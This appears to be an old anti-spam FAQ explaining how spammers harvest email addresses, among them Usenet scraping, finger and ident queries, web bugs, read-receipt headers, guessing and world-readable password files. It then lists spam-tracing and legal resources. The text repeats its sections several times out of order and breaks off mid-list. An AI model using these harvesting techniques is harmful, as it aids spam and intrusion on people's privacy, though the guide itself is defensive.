Some browsers would allow email to be sent when the mouse passes over some part of a page. Unless the browser is properly configured, no warning will be issued.
3.
Using the HTTP_FROM header that browsers send to the server.
Some browsers pass a header with your email address to every web server you visit. To check if your browser simply gives your email address to everybody this way, visit http://www.cs.rochester.edu/u/ferguson/BrowserCheck.cgi
It's worth noting here that when one reads E-mail with a browser (or any mail reader that understands HTML), the reader should be aware of active content (Java applets, Javascript, VB, etc) as well as web bugs.
An E-mail containing HTML may contain a script that upon being read (or even the subject being highlighted) automatically sends E-mail to any E-mail addresses. A good example of this case is the Melissa virus. Such a script could send the spammer not only the reader's E-mail address but all the addresses on the reader's address book.
http://www.cert.org/advisories/CA-99-04-Me...acro-Virus.html
A web bugs FAQ by Richard M. Smith can be read at http://www.tiac.net/users/smiths/privacy/wbfaq.htm
7.
From IRC and chat rooms.
Some IRC clients will give a user's email address to anyone who cares to ask it. Many spammers harvest email addresses from IRC, knowing that those are 'live' addresses and send spam to those email addresses.
This method is used beside the annoying IRCbots that send messages interactively to IRC and chat rooms without attempting to recognize who is participating in the first place.
This is another major source of email addresses for spammers, especially as this is one of the first public activities newbies join, making it easy for spammers to harvest 'fresh' addresses of people who might have very little experience dealing with spam.
AOL chat rooms are the most popular of those - according to reports there's a utility that can get the screen names of participants in AOL chat rooms. The utility is reported to be specialized for AOL due to two main reasons - AOL makes the list of the actively participating users' screen names available and AOL users are considered prime targets by spammers due to the reputation of AOL as being the ISP of choice by newbies.
8.
From finger daemons.
Some finger daemons are set to be very friendly - a finger query asking for john@host will produce list info including login names for all people named John on that host. A query for @host will produce a list of all currently logged-on users.
Spammers use this information to get extensive users list from hosts, and of active accounts - ones which are 'live' and will read their mail soon enough to be really attractive spam targets.
9.
AOL profiles.
Spammers harvest AOL names from user profiles lists, as it allows them to 'target' their mailing lists. Also, AOL has a name being the choice ISP of newbies, who might not know how to recognize scams or know how to handle spam.
10.
From domain contact points.
Every domain has one to three contact points - administration, technical, and billing. The contact point includes the email address of the contact person.
As the contact points are freely available, e.g. using the 'whois' command, spammers harvest the email addresses from the contact points for lists of domains (the list of domain is usually made available to the public by the domain registries). This is a tempting methods for spammers, as those email addresses are most usually valid and mail sent to it is being read regularily.
11.
By guessing & cleaning.
Some spammers guess email addresses, send a test message (or a real spam) to a list which includes the guessed addresses. Then they wait for either an error message to return by email, indicating that the email address is correct, or for a confirmation. A confirmation could be solicited by inserting non-standard but commonly used mail headers requesting that the delivery system and/or mail client send a confirmation of delivery or reading. No news are, of coures, good news for the spammer.
Specifically, the headers are -
Return-Receipt-To: which causes a delivery confirmation to be sent, and
X-Confirm-Reading-To: which causes a reading confirmation to be sent.
Another method of confirming valid email addresses is sending HTML in the email's body (that is sending a web page as the email's content), and embedding in the HTML an image. Mail clients that decode HTML, e.g. as Outlook and Eudora do in the preview pane, will attempt fetching the image - and some spammers put the recipient's email address in the image's URL, and check the web server's log for the email addresses of recipients who viewed the spam.
So it's good advice to set the mail client to *not* preview rich media emails, which would protect the recipient from both accidently confirming their email addresses to spammers and viruses.
Guessing could be done based on the fact that email addresses are based on people's names, usually in commonly used ways (first.last@domain or an initial of one name followed / preceded by the other @domain)
Also, some email addresses are standard - postmaster is mandated by the RFCs for internet mail. Other common email addresses are postmaster, hostmaster, root [for unix hosts], etc.
12.
From white & yellow pages.
There are various sites that serve as white pages, sometimes named people finders web sites. Yellow pages now have an email directory on the web.
Those white/yellow pages contain addresses from various sources, e.g. from UseNet, but sometimes your E-mail address will be registered for you. Example - HotMail will add E-mail addresses to BigFoot by default, making new addresses available to the public.
Spammers go through those directories in order to get email addresses. Most directories prohibit email address harvesting by spammers, but as those databases have a large databases of email addresses + names, it's a tempting target for spammers.
13.
By having access to the same computer.
If a spammer has an access to a computer, he can usually get a list of valid usernames (and therefore email addresses) on that computer.
On unix computers the users file (/etc/passwd) is commonly world readable, and the list of currently logged-in users is listed via the 'who' command.
14.
From a previous owner of the email address.
An email address might have been owned by someone else, who disposed of it. This might happen with dialup usernames at ISPs - somebody signs up for an ISP, has his/her email address harvested by spammers, and cancel the account. When somebody else signs up with the same ISP with the same username, spammers already know of it.
Similar things can happen with AOL screen names - somebody uses a screen name, gets tired of it, releases it. Later on somebody else might take the same screen name.
15.
Using social engineering.
This method means the spammer uses a hoax to convince peopleinto giving him valid E-mail addresses.
16.
A good example is Richard Douche's "Free CD's" chain letter. The letter promises a free CD for every person to whom the letter is forwarded to as long as it is CC'ed to Richard.
Richard claimed to be associated with Amazon and Music blvd, among other companies, who authorized him to make this offer. Yet hesupplied no references to web pages and used a free E-mail address.
All Richard wanted was to get people to send him valid E-mail addresses in order to build a list of addresses to spam and/or sell.
17.
From the address book and emails on other people's computers.
Some viruses & worms spread by emailing themselves to all the email addresses they can find in the email address book. As some people forward jokes and other material by email to their friends, putting their friends' email addresses on either the To: or Cc: fields, rather than the BCc: field, some viruses and warms scan the mail folders for email addresses that are not in the address book, in hope to hit addresses the computer owner's friends' friends, friends' friends' friends, etc.
If it wasn't already done, it's just a matter of time before such malware will not only spam copies of itself, but also send the extracted list of email addresses to it's creator.
As invisible email addresses can't be harvested, it's good advice to have the email addresesses of recipients of jokes & the like on BCc:, and if forwarded from somebody else remove from the email's body all the email addresses inserted by the previous sender.
18.
Buying lists from others.
This one covers two types of trades. The first type consists of buying a list of email addresses (often on CD) that were harvested via other methods, e.g. someone harvesting email addresses from UseNet and sells the list either to a company that wishes to advertise via email (sometimes passing off the list as that of people who opted-in for emailed advertisements) or to others who resell the list.
The second type consists of a company who got the email addresses legitimately (e.g. a magazine that asks subscribers for their email in order to keep in touch over the Internet) and sells the list for the extra income. This extends to selling of email addresses acompany got via other means, e.g. people who just emailed the companywith inquiries in any context.
The third type consist of technical staff selling the email address for money to spammers. There was a news story about an AOL employee who sold AOL email addresses to a spammer.
19.
By hacking into sites.
I've heard rumours that sites that supply free email addresses were hacked in order to get the list of email addresses, somewhatlike e-commerce sites being hacked to get a list of credit cards.
If your address was harvested and you get spammed, the following pages could assist you in tracking the spammer down :
1.
MindSpring's page explaining how to get an email's headers
http://help.mindspring.com/features/emailh...rs/extended.htm
2.
The spam FAQ, maintained by Ken Hollis.
http://digital.net/~gandalf/spamfaq.html
http://www.cs.ruu.nl/wais/html/na-dir/net-...q/spam-faq.html
3.
The Reporting Spam page, an excellent resource.
http://www.ao.net/waytosuccess/
4.
Reading Mail headers.
http://www.stopspam.org/email/headers/headers.html
5.
Julian Haight's Spam Cop page.
http://spamcop.net/
6.
Chris Hibbert's Junk Mail FAQ.
http://www.fortnet.org/WidowNet/faqs/junkmail.htm
7.
Sam Spade, Spam hunter.
http://samspade.org/
8.
Penn's Page of Spam.
http://home.att.net/~penn/spam.htm
9.
WD Baseley's Address Munging FAQ
http://members.aol.com/emailfaq/mungfaq.html
10.
Fight Spam on the Internet site
http://spam.abuse.net/
11.
The Spam Recycling Center
http://www.spamrecycle.com/
12.
The Junk Busters Site
http://www.junkbusters.com/
13.
The Junk Email site
http://www.junkemail.org/
14.
BCP 30: Anti-Spam Recommendations for SMTP MTAs
ftp://ftp.isi.edu/in-notes/bcp/bcp30.txt
15.
FYI 28: Netiquette Guidelines
ftp://ftp.isi.edu/in-notes/fyi/fyi28.txt
FYI 35: DON'T SPEW
A Set of Guidelines for Mass Unsolicited Mailings and Postings
ftp://ftp.isi.edu/in-notes/fyi/fyi35.txt
Several sites on the web will help in tracing spam :
1.
Pete Bowden's list of traceroute gateways
http://www.missing.com/traceroute.html
To find traceroute gateways in any country, visit here.
http://www.traceroute.org/
2.
Allwhois.com gates to whois on any domain world-wide
http://www.allwhois.com/
3.
A list of whois servers, collected by Matt Power
ftp://sipb.mit.edu/pub/whois/whois-servers.list
4.
Alldomains.com site - links to NICs worldwide.
http://www.alldomains.com/
A similar page can be found at
http://www.forumnett.no/domreg.html
5.
The Coalition Against Usolicited Commerical E-mail.
http://www.cauce.org/
The European CAUCE.
http://www.euro.cauce.org/en/index.html
The Coalition Against Unsolicited Bulk Email, Australia.
http://www.caube.org.au/
The Russian Anti-Spam organization.
http://www.antispam.ru/
6.
No More Spam - ISP Spam-Blocking Interferes With Business
http://www.byte.com/columns/digitalbiz/199...0405coombs.html
7.
Removing the Spam, By Geoff Mulligan, Published by Addison Wesley, ISBN 0-201-37957-0
A good book about handling spam.
Legal resources :
1.
FTC Consumer Alert - FTC Names Its Dirty Dozen: 12 Scams Most Likely to Arrive Via Bulk email
http://www.ftc.gov/bcp/conline/pubs/alerts/doznalrt.htm
2.
Report to the Federal Trade Commision of the Ad-Hoc Working Group on Unsolicited Commercial Mail. http://www.cdt.org/spam/
3.
Pyramid Schemes, Ponzi Schemes, and Related Frauds
http://www.impulse.net/~thebob/Pyramid.html
4.
The AOL vs. Cyberpromo case
http://legal.web.aol.com/decisions/dljunk/cyber.html
Nine New Lawsuits Press Release.
http://legal.web.aol.com/decisions/dljunk/ninepress.html
5.
"Intel scores in email suit", by Jim Hu, CNET News.com.
http://www.news.com/News/Item/0,4,29574,00.html?st.ne.ni.lh
6.
The John Marshall Law School spam page
http://www.jmls.edu/cyber/index/spam.html
7.
First amendment issues related to UBE, by Paul L. Schmehl.
http://www.utdallas.edu/~pauls/spam_law.html
8.
U.S. Anti-Spam Laws
http://www.the-dma.org/antispam/statespamlaws.shtml
9.
The UK Data Protection Law
http://www.dataprotection.gov.uk/
10.
The Italian Anti-Spam Law
http://www.parlamento.it/parlam/leggi/deleghe/99185dl.htm
11.
The Austrian Telecm Law
http://www.parlament.gv.at/pd/pm/XX/I/texte/020/I02064_.html
http://www.bmv.gv.at/tk/3telecom/recht/tkg/inhalt.htm
12.
The Norwegian Marketing Control Act
http://www.forbrukerombudet.no/html/engelsk/themcact.htm
1.
From posts to UseNet with your email address.
Spammers regularily scan UseNet for email address, using ready made programs designed to do so. Some programs just look at articles headers which contain email address (From:, Reply-To:, etc), while other programs check the articles' bodies, starting with programs that look at signatures, through programs that take everything that contain a '@' character and attempt to demunge munged email addresses.
There have been reports of spammers demunging email addresses on occasions, ranging from demunging a single address for purposes of revenge spamming to automatic methods that try to unmunge email addresses that were munged in some common ways, e.g. remove such strings as 'nospam' from email addresses.
As people who where spammed frequently report that spam frequency to their mailbox dropped sharply after a period in which they did not post to UseNet, as well as evidence to spammers' chase after 'fresh' and 'live' addresses, this technique seems to be the primary source of email addresses for spammers.
2.
From mailing lists.
Spammers regularily attempt to get the lists of subscribers to mailing lists [some mail servers will give those upon request],knowing that the email addresses are unmunged and that only a few of the addresses are invalid.
When mail servers are configured to refuse such requests, another trick might be used - spammers might send an email to the mailing list with the headers Return-Receipt-To:
A different technique used by spammers is to request a mailing lists server to give him the list of all mailing lists it carries (an option implemented by some mailing list servers for the convenience of legitimate users), and then send the spam to the mailing list's address, leaving the server to do the hard work of forwarding a copy to each subscribed email address.
[I know spammers use this trick from bad experience - some spammer used this trick on the list server of the company for which I work, easily covering most of the employees, including employees working well under a month and whose email addresses would be hard to findin other ways.]
3.
From web pages.
Spammers have programs which spider through web pages, looking for email addresses, e.g. email addresses contained in mailto: HTML tags [those you can click on and get a mail window opened]
Some spammers even target their mail based on web pages. I've discovered a web page of mine appeared in Yahoo as some spammer harvested email addresses from each new page appearing in Yahoo and sent me a spam regarding that web page.
A widely used technique to fight this technique is the 'poison' CGI script. The script creates a page with several bogus email addresses and a link to itself. Spammers' software visiting the page would harvest the bogus email addresses and follow up the link, entering an infinite loop polluting their lists with bogus email addresses.
For more information about the poision script, see http://www.monkeys.com/wpoison/
4.
From various web and paper forms.
Some sites request various details via forms, e.g. guest books & registrations forms. Spammers can get email addresses from those either because the form becomes available on the world wide web, or because the site sells / gives the emails list to others.
Some companies would sell / give email lists filled in on paper forms, e.g. organizers of conventions would make a list of participants' email addresses, and sell it when it's no longer needed.
Some spammers would actually type E-mail addresses from printed material, e.g. professional directories & conference proceedings.
Domain name registration forms are a favourite as well - addresses are most usually correct and updated, and people read the emails sent to them expecting important messages.
5.
Via an Ident daemon.
Many unix computers run a daemon (a program which runs in the background, initiated by the system administrator), intended to allow other computers to identify people who connect to them.
When a person surfs from such a computer connects to a web site or news server, the site or server can connect the person's computer back and ask that daemon's for the person's email address.
Some chat clients on PCs behave similarily, so using IRC can cause an email address to be given out to spammers.
6.
From a web browser.
Some sites use various tricks to extract a surfer's email address from the web browser, sometimes without the surfer noticing it. Those techniques include :
1.
Making the browser fetch one of the page's images through an anonymous FTP connection to the site.
Some browsers would give the email address the user has configured into the browser as the password for the anonymous FTP account. A surfer not aware of this technique will not notice that the email address has leaked.
2.
Using JavaScript to make the browser send an email to a chosen email address with the email address configured into the browser.
Some browsers would allow email to be sent when the mouse passes over some part of a page. Unless the browser is properly configured, no warning will be issued.
3.
Using the HTTP_FROM header that browsers send to the server.
Some browsers pass a header with your email address to every web server you visit. To check if your browser simply gives your email address to everybody this way, visit http://www.cs.rochester.edu/u/ferguson/BrowserCheck.cgi
It's worth noting here that when one reads E-mail with a browser (or any mail reader that understands HTML), the reader should be aware of active content (Java applets, Javascript, VB, etc) as well as web bugs.
An E-mail containing HTML may contain a script that upon being read (or even the subject being highlighted) automatically sends E-mail to any E-mail addresses. A good example of this case is the Melissa virus. Such a script could send the spammer not only the reader's E-mail address but all the addresses on the reader's address book.
http://www.cert.org/advisories/CA-99-04-Me...acro-Virus.html
A web bugs FAQ by Richard M. Smith can be read at http://www.tiac.net/users/smiths/privacy/wbfaq.htm
7.
From IRC and chat rooms.
Some IRC clients will give a user's email address to anyone who cares to ask it. Many spammers harvest email addresses from IRC, knowing that those are 'live' addresses and send spam to those email addresses.
This method is used beside the annoying IRCbots that send messages interactively to IRC and chat rooms without attempting to recognize who is participating in the first place.
This is another major source of email addresses for spammers, especially as this is one of the first public activities newbies join, making it easy for spammers to harvest 'fresh' addresses of people who might have very little experience dealing with spam.
AOL chat rooms are the most popular of those - according to reports there's a utility that can get the screen names of participants in AOL chat rooms. The utility is reported to be specialized for AOL due to two main reasons - AOL makes the list of the actively participating users' screen names available and AOL users are considered prime targets by spammers due to the reputation of AOL as being the ISP of choice by newbies.
8.
From finger daemons.
Some finger daemons are set to be very friendly - a finger query asking for john@host will produce list info including login names for all people named John on that host. A query for @host will produce a list of all currently logged-on users.
Spammers use this information to get extensive users list from hosts, and of active accounts - ones which are 'live' and will read their mail soon enough to be really attractive spam targets.
9.
AOL profiles.
Spammers harvest AOL names from user profiles lists, as it allows them to 'target' their mailing lists. Also, AOL has a name being the choice ISP of newbies, who might not know how to recognize scams or know how to handle spam.
10.
From domain contact points.
Every domain has one to three contact points - administration, technical, and billing. The contact point includes the email address of the contact person.
As the contact points are freely available, e.g. using the 'whois' command, spammers harvest the email addresses from the contact points for lists of domains (the list of domain is usually made available to the public by the domain registries). This is a tempting methods for spammers, as those email addresses are most usually valid and mail sent to it is being read regularily.
11.
By guessing & cleaning.
Some spammers guess email addresses, send a test message (or a real spam) to a list which includes the guessed addresses. Then they wait for either an error message to return by email, indicating that the email address is correct, or for a confirmation. A confirmation could be solicited by inserting non-standard but commonly used mail headers requesting that the delivery system and/or mail client send a confirmation of delivery or reading. No news are, of coures, good news for the spammer.
Specifically, the headers are -
Return-Receipt-To:
X-Confirm-Reading-To:
Another method of confirming valid email addresses is sending HTML in the email's body (that is sending a web page as the email's content), and embedding in the HTML an image. Mail clients that decode HTML, e.g. as Outlook and Eudora do in the preview pane, will attempt fetching the image - and some spammers put the recipient's email address in the image's URL, and check the web server's log for the email addresses of recipients who viewed the spam.
So it's good advice to set the mail client to *not* preview rich media emails, which would protect the recipient from both accidently confirming their email addresses to spammers and viruses.
Guessing could be done based on the fact that email addresses are based on people's names, usually in commonly used ways (first.last@domain or an initial of one name followed / preceded by the other @domain)
Also, some email addresses are standard - postmaster is mandated by the RFCs for internet mail. Other common email addresses are postmaster, hostmaster, root [for unix hosts], etc.
12.
From white & yellow pages.
There are various sites that serve as white pages, sometimes named people finders web sites. Yellow pages now have an email directory on the web.
Those white/yellow pages contain addresses from various sources, e.g. from UseNet, but sometimes your E-mail address will be registered for you. Example - HotMail will add E-mail addresses to BigFoot by default, making new addresses available to the public.
Spammers go through those directories in order to get email addresses. Most directories prohibit email address harvesting by spammers, but as those databases have a large databases of email addresses + names, it's a tempting target for spammers.
13.
By having access to the same computer.
If a spammer has an access to a computer, he can usually get a list of valid usernames (and therefore email addresses) on that computer.
On unix computers the users file (/etc/passwd) is commonly world readable, and the list of currently logged-in users is listed via the 'who' command.
14.
From a previous owner of the email address.
An email address might have been owned by someone else, who disposed of it. This might happen with dialup usernames at ISPs - somebody signs up for an ISP, has his/her email address harvested by spammers, and cancel the account. When somebody else signs up with the same ISP with the same username, spammers already know of it.
Similar things can happen with AOL screen names - somebody uses a screen name, gets tired of it, releases it. Later on somebody else might take the same screen name.
15.
Using social engineering.
This method means the spammer uses a hoax to convince peopleinto giving him valid E-mail addresses.
16.
A good example is Richard Douche's "Free CD's" chain letter. The letter promises a free CD for every person to whom the letter is forwarded to as long as it is CC'ed to Richard.
Richard claimed to be associated with Amazon and Music blvd, among other companies, who authorized him to make this offer. Yet hesupplied no references to web pages and used a free E-mail address.
All Richard wanted was to get people to send him valid E-mail addresses in order to build a list of addresses to spam and/or sell.
17.
From the address book and emails on other people's computers.
Some viruses & worms spread by emailing themselves to all the email addresses they can find in the email address book. As some people forward jokes and other material by email to their friends, putting their friends' email addresses on either the To: or Cc: fields, rather than the BCc: field, some viruses and warms scan the mail folders for email addresses that are not in the address book, in hope to hit addresses the computer owner's friends' friends, friends' friends' friends, etc.
If it wasn't already done, it's just a matter of time before such malware will not only spam copies of itself, but also send the extracted list of email addresses to it's creator.
As invisible email addresses can't be harvested, it's good advice to have the email addresesses of recipients of jokes & the like on BCc:, and if forwarded from somebody else remove from the email's body all the email addresses inserted by the previous sender.
18.
Buying lists from others.
This one covers two types of trades. The first type consists of buying a list of email addresses (often on CD) that were harvested via other methods, e.g. someone harvesting email addresses from UseNet and sells the list either to a company that wishes to advertise via email (sometimes passing off the list as that of people who opted-in for emailed advertisements) or to others who resell the list.
The second type consists of a company who got the email addresses legitimately (e.g. a magazine that asks subscribers for their email in order to keep in touch over the Internet) and sells the list for the extra income. This extends to selling of email addresses acompany got via other means, e.g. people who just emailed the companywith inquiries in any context.
The third type consist of technical staff selling the email address for money to spammers. There was a news story about an AOL employee who sold AOL email addresses to a spammer.
19.
By hacking into sites.
I've heard rumours that sites that supply free email addresses were hacked in order to get the list of email addresses, somewhatlike e-commerce sites being hacked to get a list of credit cards.
If your address was harvested and you get spammed, the following pages could assist you in tracking the spammer down :
1.
MindSpring's page explaining how to get an email's headers
http://help.mindspring.com/features/emailh...rs/extended.htm
2.
The spam FAQ, maintained by Ken Hollis.
http://digital.net/~gandalf/spamfaq.html
http://www.cs.ruu.nl/wais/html/na-dir/net-...q/spam-faq.html
3.
The Reporting Spam page, an excellent resource.
http://www.ao.net/waytosuccess/
4.
Reading Mail headers.
http://www.stopspam.org/email/headers/headers.html
5.
Julian Haight's Spam Cop page.
http://spamcop.net/
6.
Chris Hibbert's Junk Mail FAQ.
http://www.fortnet.org/WidowNet/faqs/junkmail.htm
7.
Sam Spade, Spam hunter.
http://samspade.org/
8.
Penn's Page of Spam.
http://home.att.net/~penn/spam.htm
9.
WD Baseley's Address Munging FAQ
http://members.aol.com/emailfaq/mungfaq.html
10.
Fight Spam on the Internet site
http://spam.abuse.net/
11.
The Spam Recycling Center
http://www.spamrecycle.com/
12.
The Junk Busters Site
http://www.junkbusters.com/
13.
The Junk Email site
http://www.junkemail.org/
14.
BCP 30: Anti-Spam Recommendations for SMTP MTAs
ftp://ftp.isi.edu/in-notes/bcp/bcp30.txt
15.
FYI 28: Netiquette Guidelines
ftp://ftp.isi.edu/in-notes/fyi/fyi28.txt
FYI 35: DON'T SPEW
A Set of Guidelines for Mass Unsolicited Mailings and Postings
ftp://ftp.isi.edu/in-notes/fyi/fyi35.txt
Several sites on the web will help in tracing spam :
1.
Pete Bowden's list of traceroute gateways
http://www.missing.com/traceroute.html
To find traceroute gateways in any country, visit here.
http://www.traceroute.org/
2.
Allwhois.com gates to whois on any domain world-wide
http://www.allwhois.com/
3.
A list of whois servers, collected by Matt Power
ftp://sipb.mit.edu/pub/whois/whois-servers.list
4.
Alldomains.com site - links to NICs worldwide.
http://www.alldomains.com/
A similar page can be found at
http://www.forumnett.no/domreg.html
5.
The Coalition Against Usolicited Commerical E-mail.
http://www.cauce.org/
The European CAUCE.
http://www.euro.cauce.org/en/index.html
The Coalition Against Unsolicited Bulk Email, Australia.
http://www.caube.org.au/
The Russian Anti-Spam organization.
http://www.antispam.ru/
6.
No More Spam - ISP Spam-Blocking Interferes With Business
http://www.byte.com/columns/digitalbiz/199...0405coombs.html
7.
Removing the Spam, By Geoff Mulligan, Published by Addison Wesley, ISBN 0-201-37957-0
A good book about handling spam.
Legal resources :
1.
FTC Consumer Alert - FTC Names Its Dirty Dozen: 12 Scams Most Likely to Arrive Via Bulk email
http://www.ftc.gov/bcp/conline/pubs/alerts/doznalrt.htm
2.
Report to the Federal Trade Commision of the Ad-Hoc Working Group on Unsolicited Commercial Mail. http://www.cdt.org/spam/
3.
Pyramid Schemes, Ponzi Schemes, and Related Frauds
http://www.impulse.net/~thebob/Pyramid.html
4.
The AOL vs. Cyberpromo case
http://legal.web.aol.com/decisions/dljunk/cyber.html
Nine New Lawsuits Press Release.
http://legal.web.aol.com/decisions/dljunk/ninepress.html
5.
"Intel scores in email suit", by Jim Hu, CNET News.com.
http://www.news.com/News/Item/0,4,29574,00.html?st.ne.ni.lh
6.
The John Marshall Law School spam page
http://www.jmls.edu/cyber/index/spam.html
7.
First amendment issues related to UBE, by Paul L. Schmehl.
http://www.utdallas.edu/~pauls/spam_law.html
8.
U.S. Anti-Spam Laws
http://www.the-dma.org/antispam/statespamlaws.shtml
9.
The UK Data Protection Law
http://www.dataprotection.gov.uk/
10.
There are many ways in which spammers can get your email address. The ones I know of are :
1.
From posts to UseNet with your email address.
Spammers regularily scan UseNet for email address, using ready made programs designed to do so. Some programs just look at articles headers which contain email address (From:, Reply-To:, etc), while other programs check the articles' bodies, starting with programs that look at signatures, through programs that take everything that contain a '@' character and attempt to demunge munged email addresses.
There have been reports of spammers demunging email addresses on occasions, ranging from demunging a single address for purposes of revenge spamming to automatic methods that try to unmunge email addresses that were munged in some common ways, e.g. remove such strings as 'nospam' from email addresses.
As people who where spammed frequently report that spam frequency to their mailbox dropped sharply after a period in which they did not post to UseNet, as well as evidence to spammers' chase after 'fresh' and 'live' addresses, this technique seems to be the primary source of email addresses for spammers.
2.
From mailing lists.
Spammers regularily attempt to get the lists of subscribers to mailing lists [some mail servers will give those upon request],knowing that the email addresses are unmunged and that only a few of the addresses are invalid.
When mail servers are configured to refuse such requests, another trick might be used - spammers might send an email to the mailing list with the headers Return-Receipt-To:
A different technique used by spammers is to request a mailing lists server to give him the list of all mailing lists it carries (an option implemented by some mailing list servers for the convenience of legitimate users), and then send the spam to the mailing list's address, leaving the server to do the hard work of forwarding a copy to each subscribed email address.
[I know spammers use this trick from bad experience - some spammer used this trick on the list server of the company for which I work, easily covering most of the employees, including employees working well under a month and whose email addresses would be hard to findin other ways.]
3.
From web pages.
Spammers have programs which spider through web pages, looking for email addresses, e.g. email addresses contained in mailto: HTML tags [those you can click on and get a mail window opened]
Some spammers even target their mail based on web pages. I've discovered a web page of mine appeared in Yahoo as some spammer harvested email addresses from each new page appearing in Yahoo and sent me a spam regarding that web page.
A widely used technique to fight this technique is the 'poison' CGI script. The script creates a page with several bogus email addresses and a link to itself. Spammers' software visiting the page would harvest the bogus email addresses and follow up the link, entering an infinite loop polluting their lists with bogus email addresses.
For more information about the poision script, see http://www.monkeys.com/wpoison/
4.
From various web and paper forms.
Some sites request various details via forms, e.g. guest books & registrations forms. Spammers can get email addresses from those either because the form becomes available on the world wide web, or because the site sells / gives the emails list to others.
Some companies would sell / give email lists filled in on paper forms, e.g. organizers of conventions would make a list of participants' email addresses, and sell it when it's no longer needed.
Some spammers would actually type E-mail addresses from printed material, e.g. professional directories & conference proceedings.
Domain name registration forms are a favourite as well - addresses are most usually correct and updated, and people read the emails sent to them expecting important messages.
5.
Via an Ident daemon.
Many unix computers run a daemon (a program which runs in the background, initiated by the system administrator), intended to allow other computers to identify people who connect to them.
When a person surfs from such a computer connects to a web site or news server, the site or server can connect the person's computer back and ask that daemon's for the person's email address.
Some chat clients on PCs behave similarily, so using IRC can cause an email address to be given out to spammers.
6.
From a web browser.
Some sites use various tricks to extract a surfer's email address from the web browser, sometimes without the surfer noticing it. Those techniques include :
1.
Making the browser fetch one of the page's images through an anonymous FTP connection to the site.
Some browsers would give the email address the user has configured into the browser as the password for the anonymous FTP account. A surfer not aware of this technique will not notice that the email address has leaked.
2.
Using JavaScript to make the browser send an email to a chosen email address with the email address configured into the browser.
Some browsers would allow email to be sent when the mouse passes over some part of a page. Unless the browser is properly configured, no warning will be issued.
3.
Using the HTTP_FROM header that browsers send to the server.
Some browsers pass a header with your email address to every web server you visit. To check if your browser simply gives your email address to everybody this way, visit http://www.cs.rochester.edu/u/ferguson/BrowserCheck.cgi
It's worth noting here that when one reads E-mail with a browser (or any mail reader that understands HTML), the reader should be aware of active content (Java applets, Javascript, VB, etc) as well as web bugs.
An E-mail containing HTML may contain a script that upon being read (or even the subject being highlighted) automatically sends E-mail to any E-mail addresses. A good example of this case is the Melissa virus. Such a script could send the spammer not only the reader's E-mail address but all the addresses on the reader's address book.
http://www.cert.org/advisories/CA-99-04-Me...acro-Virus.html
A web bugs FAQ by Richard M. Smith can be read at http://www.tiac.net/users/smiths/privacy/wbfaq.htm
7.
From IRC and chat rooms.
Some IRC clients will give a user's email address to anyone who cares to ask it. Many spammers harvest email addresses from IRC, knowing that those are 'live' addresses and send spam to those email addresses.
This method is used beside the annoying IRCbots that send messages interactively to IRC and chat rooms without attempting to recognize who is participating in the first place.
This is another major source of email addresses for spammers, especially as this is one of the first public activities newbies join, making it easy for spammers to harvest 'fresh' addresses of people who might have very little experience dealing with spam.
AOL chat rooms are the most popular of those - according to reports there's a utility that can get the screen names of participants in AOL chat rooms. The utility is reported to be specialized for AOL due to two main reasons - AOL makes the list of the actively participating users' screen names available and AOL users are considered prime targets by spammers due to the reputation of AOL as being the ISP of choice by newbies.
8.
From finger daemons.
Some finger daemons are set to be very friendly - a finger query asking for john@host will produce list info including login names for all people named John on that host. A query for @host will produce a list of all currently logged-on users.
Spammers use this information to get extensive users list from hosts, and of active accounts - ones which are 'live' and will read their mail soon enough to be really attractive spam targets.
9.
AOL profiles.
Spammers harvest AOL names from user profiles lists, as it allows them to 'target' their mailing lists. Also, AOL has a name being the choice ISP of newbies, who might not know how to recognize scams or know how to handle spam.
10.
From domain contact points.
Every domain has one to three contact points - administration, technical, and billing. The contact point includes the email address of the contact person.
As the contact points are freely available, e.g. using the 'whois' command, spammers harvest the email addresses from the contact points for lists of domains (the list of domain is usually made available to the public by the domain registries). This is a tempting methods for spammers, as those email addresses are most usually valid and mail sent to it is being read regularily.
11.
By guessing & cleaning.
Some spammers guess email addresses, send a test message (or a real spam) to a list which includes the guessed addresses. Then they wait for either an error message to return by email, indicating that the email address is correct, or for a confirmation. A confirmation could be solicited by inserting non-standard but commonly used mail headers requesting that the delivery system and/or mail client send a confirmation of delivery or reading. No news are, of coures, good news for the spammer.
Specifically, the headers are -
Return-Receipt-To:
X-Confirm-Reading-To:
Another method of confirming valid email addresses is sending HTML in the email's body (that is sending a web page as the email's content), and embedding in the HTML an image. Mail clients that decode HTML, e.g. as Outlook and Eudora do in the preview pane, will attempt fetching the image - and some spammers put the recipient's email address in the image's URL, and check the web server's log for the email addresses of recipients who viewed the spam.
So it's good advice to set the mail client to *not* preview rich media emails, which would protect the recipient from both accidently confirming their email addresses to spammers and viruses.
Guessing could be done based on the fact that email addresses are based on people's names, usually in commonly used ways (first.last@domain or an initial of one name followed / preceded by the other @domain)
Also, some email addresses are standard - postmaster is mandated by the RFCs for internet mail. Other common email addresses are postmaster, hostmaster, root [for unix hosts], etc.
12.
From white & yellow pages.
There are various sites that serve as white pages, sometimes named people finders web sites. Yellow pages now have an email directory on the web.
Those white/yellow pages contain addresses from various sources, e.g. from UseNet, but sometimes your E-mail address will be registered for you. Example - HotMail will add E-mail addresses to BigFoot by default, making new addresses available to the public.
Spammers go through those directories in order to get email addresses. Most directories prohibit email address harvesting by spammers, but as those databases have a large databases of email addresses + names, it's a tempting target for spammers.
13.
By having access to the same computer.
If a spammer has an access to a computer, he can usually get a list of valid usernames (and therefore email addresses) on that computer.
On unix computers the users file (/etc/passwd) is commonly world readable, and the list of currently logged-in users is listed via the 'who' command.
14.
From a previous owner of the email address.
An email address might have been owned by someone else, who disposed of it. This might happen with dialup usernames at ISPs - somebody signs up for an ISP, has his/her email address harvested by spammers, and cancel the account. When somebody else signs up with the same ISP with the same username, spammers already know of it.
Similar things can happen with AOL screen names - somebody uses a screen name, gets tired of it, releases it. Later on somebody else might take the same screen name.
15.
Using social engineering.
This method means the spammer uses a hoax to convince peopleinto giving him valid E-mail addresses.
16.
A good example is Richard Douche's "Free CD's" chain letter. The letter promises a free CD for every person to whom the letter is forwarded to as long as it is CC'ed to Richard.
Richard claimed to be associated with Amazon and Music blvd, among other companies, who authorized him to make this offer. Yet hesupplied no references to web pages and used a free E-mail address.
All Richard wanted was to get people to send him valid E-mail addresses in order to build a list of addresses to spam and/or sell.
17.
From the address book and emails on other people's computers.
